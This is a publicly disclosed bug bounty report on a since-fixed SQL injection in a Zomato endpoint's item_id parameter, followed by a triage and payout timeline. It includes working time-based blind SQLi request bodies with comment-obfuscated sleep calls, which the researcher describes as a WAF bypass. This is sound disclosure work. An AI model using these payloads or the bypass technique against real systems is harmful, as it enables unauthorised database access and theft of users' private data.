[www.zomato.com] SQLi - /php/██████████ - item_id
State Resolved (Closed)
Disclosed publicly 2018-09-11T05:04:45.002Z
Reported To
Weakness SQL Injection
Bounty $2,000
Collapse
Summary by gerben_javado

Thanks to the entire @Zomato team for doing this challenge. Its a pleasure to be back in the bug bounty game after a while.

Introduction

So I managed to find SQLi on https://www.zomato.com/php/██████████ in the POST parameter item_id. Debugging and exploiting this issue was somewhat confusing in the beginning because there seems to be database caching going on based on the int value that is given. So for example when you submit item_id=1111-stuffthatchangeshere multiple times the payload won't work anymore. In order to circumvent this caching you need to increment or decrement the integer before the payload every request.

Exploitation

I started of simple to really understand that we were dealing with a SQLi. The sleep command was the way for me to proof this and this worked quite easily using my previous discovered Akamai Kona Bypass:

POST https://www.zomato.com/php/██████████
Body: res_id=1111&method=add_menu_item_tags&item_id=1111-sleep/*f*/(10)&new_tags[]=3&menu_id=1111

From there I wanted to proof data extraction and came up with the following POC:

Response time: 6090ms

POST https://www.zomato.com/php/██████████
res_id=1111&method=add_menu_item_tags&item_id=1111-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111

Response time: 910ms

POST https://www.zomato.com/php/██████████
res_id=1111&method=add_menu_item_tags&item_id=1111-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111

This proofs that version() starts with a 5 and shows that we can extract data out of the database. At this point I stopped testing to write the report. Good luck fixing.

Impact

Full database access holding private user information.

Summary by gerben_javado

Thanks @gerben_javado for helping us keep @zomato secure :)

Timeline
submitted a report to Zomato .
2018-08-31T19:50:43.729Z

Regards,
Frans

  • 0 attachments:
shreysinha Activities::Comment
2018-08-31T19:56:49.844Z


prateek_0490-zomato Activities::Comment
2018-09-01T00:02:39.259Z


prateek_0490-zomato Activities::BugTriaged
2018-09-01T00:02:50.227Z


gerben_javado Activities::Comment
2018-09-01T00:07:27.769Z


gerben_javado Activities::Comment
2018-09-01T00:08:00.496Z


gerben_javado Activities::Comment
2018-09-01T00:20:07.001Z


gerben_javado Activities::Comment
2018-09-01T00:23:20.678Z


gerben_javado Activities::Comment
2018-09-01T00:32:57.106Z


prateek_0490-zomato Activities::Comment
2018-09-01T00:35:26.824Z


gerben_javado Activities::Comment
2018-09-01T00:37:19.405Z


prateek_0490-zomato Activities::Comment
2018-09-01T00:41:19.298Z


gerben_javado Activities::Comment
2018-09-01T00:42:50.686Z


prateek_0490-zomato Activities::BugResolved
2018-09-01T08:46:40.783Z


Activities::BountyAwarded
2018-09-02T07:49:55.720Z


gerben_javado Activities::AgreedOnGoingPublic
2018-09-08T12:00:32.423Z


prateek_0490-zomato Activities::Comment
2018-09-08T15:02:02.819Z


gerben_javado Activities::Comment
2018-09-08T15:20:41.570Z


gerben_javado Activities::Comment
2018-09-10T14:58:19.414Z


prateek_0490-zomato Activities::Comment
2018-09-10T16:15:03.876Z


prateek_0490-zomato Activities::AgreedOnGoingPublic
2018-09-11T05:04:44.903Z


prateek_0490-zomato Activities::ReportBecamePublic
2018-09-11T05:04:45.035Z